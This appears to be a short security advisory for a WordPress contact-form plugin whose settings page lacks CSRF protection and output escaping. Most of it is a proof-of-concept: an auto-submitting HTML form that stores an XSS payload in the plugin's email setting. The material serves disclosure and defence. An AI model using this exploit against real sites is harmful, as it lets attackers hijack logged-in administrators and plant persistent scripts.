The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack and lead to Stored XSS due to the lack of sanitisation and escaping as well
<form id="test" action="https://example.com/wp-admin/plugins.php?page=clean_contact" method="POST">
<input type="text" name="clean_contact_settings" value="1">
<input type="text" name="clean_contact_email" value='[email protected]"><img src onerror=alert(/XSS/)>'>
<input type="text" name="clean_contact_cc" value="">
<input type="text" name="clean_contact_bcc" value="[email protected]">
<input type="text" name="clean_contact_prefix" value="clean-contact">
<input type="text" name="clean_contact_thanks" value="Thank you. Message sent!">
<input type="text" name="clean_contact_thanks_url" value="https://example.com">
<input type="text" name="clean_contact_from_email" value="">
<input type="text" name="Submit" value="Save Settings">
</form>
<script>
document.getElementById("test").submit();
</script>